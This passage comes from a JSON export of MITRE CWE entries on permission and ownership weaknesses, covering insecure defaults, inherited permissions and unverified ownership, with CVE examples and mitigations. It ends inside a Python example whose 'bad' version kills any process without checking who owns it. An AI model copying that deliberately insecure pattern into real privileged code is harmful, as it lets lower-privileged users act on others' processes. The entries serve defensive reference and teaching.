world-readable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1713"},{"Reference":"CVE-2001-1550","Description":"World-writable log files allow information loss; world-readable file has cleartext passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1550"},{"Reference":"CVE-2002-1711","Description":"World-readable directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1711"},{"Reference":"CVE-2002-1844","Description":"Windows product uses insecure permissions when installing on Solaris (genesis: port error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1844"},{"Reference":"CVE-2001-0497","Description":"Insecure permissions for a shared secret key file. Overlaps cryptographic problem.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0497"},{"Reference":"CVE-1999-0426","Description":"Default permissions of a device allow IP spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0426"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure Default Permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO01-J","Entry_Name":"Create files with appropriate access permission"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"81"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Insecure Defaults", Page 69"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Modes_of_Introduction, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insecure Default Permissions","attr":{"@_Date":"2009-05-27"}}}},"277":{"attr":{"@_ID":"277","@_Name":"Insecure Inherited Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product defines a set of insecure permissions that are inherited by objects that are created by the program.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1841","Description":"User\'s umask is used when creating temp files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1841"},{"Reference":"CVE-2002-1786","Description":"Insecure umask for core dumps [is the umask preserved or assigned?].","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1786"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure inherited permissions"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"278":{"attr":{"@_ID":"278","@_Name":"Insecure Preserved Inherited Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1724","Description":"Does not obey specified permissions when exporting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1724"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure preserved inherited permissions"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"279":{"attr":{"@_ID":"279","@_Name":"Incorrect Execution-Assigned Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"While it is executing, the software sets the permissions of an object in a way that violates the intended permissions that have been specified by the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0265","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0265"},{"Reference":"CVE-2003-0876","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0876"},{"Reference":"CVE-2002-1694","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1694"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure execution-assigned permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO01-J","Entry_Name":"Create files with appropriate access permission"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"81"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Insecure Execution-assigned Permissions","attr":{"@_Date":"2009-05-27"}}}},"280":{"attr":{"@_ID":"280","@_Name":"Improper Handling of Insufficient Permissions or Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the application in an invalid state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"Phase":"Implementation","Description":"Always check to see if you have successfully accessed a resource or system functionality, and use proper error handling if it is unsuccessful. Do this even when you are operating in a highly privileged mode, because errors or environmental conditions might still cause a failure. For example, environments with highly granular permissions/privilege models, such as Windows or Linux capabilities, can cause unexpected failures."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0501","Description":"Special file system allows attackers to prevent ownership/permission change of certain entries by opening the entries before calling a setuid program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0501"},{"Reference":"CVE-2004-0148","Description":"FTP server places a user in the root directory when the user\'s permissions prevent access to the their own home directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0148"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Fails poorly due to insufficient permissions"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":17,"Entry_Name":"Improper Filesystem Permissions"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Notes":{"Note":[{"#text":"CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future.","attr":{"@_Type":"Maintenance"}},{"#text":"This can be both primary and resultant. When primary, it can expose a variety of weaknesses because a resource might not have the expected state, and subsequent operations might fail. It is often resultant from Unchecked Error Condition (CWE-391).","attr":{"@_Type":"Relationship"}},{"#text":"Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).","attr":{"@_Type":"Theoretical"}},{"#text":"This type of issue is under-studied, since researchers often concentrate on whether an object has too many permissions, instead of not enough. These weaknesses are likely to appear in environments with fine-grained models for permissions and privileges, which can include operating systems and other large-scale software packages. However, even highly simplistic permission/privilege models are likely to contain these issues if the developer has not considered the possibility of access failure.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Failure to Handle Insufficient Permissions or Privileges","attr":{"@_Date":"2009-03-10"}}}},"281":{"attr":{"@_ID":"281","@_Name":"Improper Preservation of Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"This is resultant from errors that prevent the permissions from being preserved."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2323","Description":"Incorrect ACLs used when restoring backups from directories that use symbolic links.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2323"},{"Reference":"CVE-2001-1515","Description":"Automatic modification of permissions inherited from another file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1515"},{"Reference":"CVE-2005-1920","Description":"Permissions on backup file are created with defaults, possibly less secure than original file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1920"},{"Reference":"CVE-2001-0195","Description":"File is made world-readable when being cloned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0195"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Permission preservation failure"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Permission Preservation Failure","attr":{"@_Date":"2009-05-27"}}}},"282":{"attr":{"@_ID":"282","@_Name":"Improper Ownership Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1125","Description":"Program runs setuid root but relies on a configuration file owned by a non-root user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1125"}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Ownership errors"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Ownership Issues","attr":{"@_Date":"2008-04-11"}}}},"283":{"attr":{"@_ID":"283","@_Name":"Unverified Ownership","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify that a critical resource is owned by the proper entity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"282","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain unauthorized access to system resources."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This function is part of a privileged program that takes input from users with potentially lower privileges.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def killProcess(processID):","xhtml:div":{"#text":"os.kill(processID, signal.SIGKILL)","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def killProcess(processID):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"user = getCurrentUser()if getProcessOwner(processID) == user:else:","xhtml:br":["","","",""],"xhtml:i":"#Check process owner against requesting user","xhtml:div":[{"#text":"os.kill(processID, signal.SIGKILL)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"print(\\"You cannot kill a process you don\'t 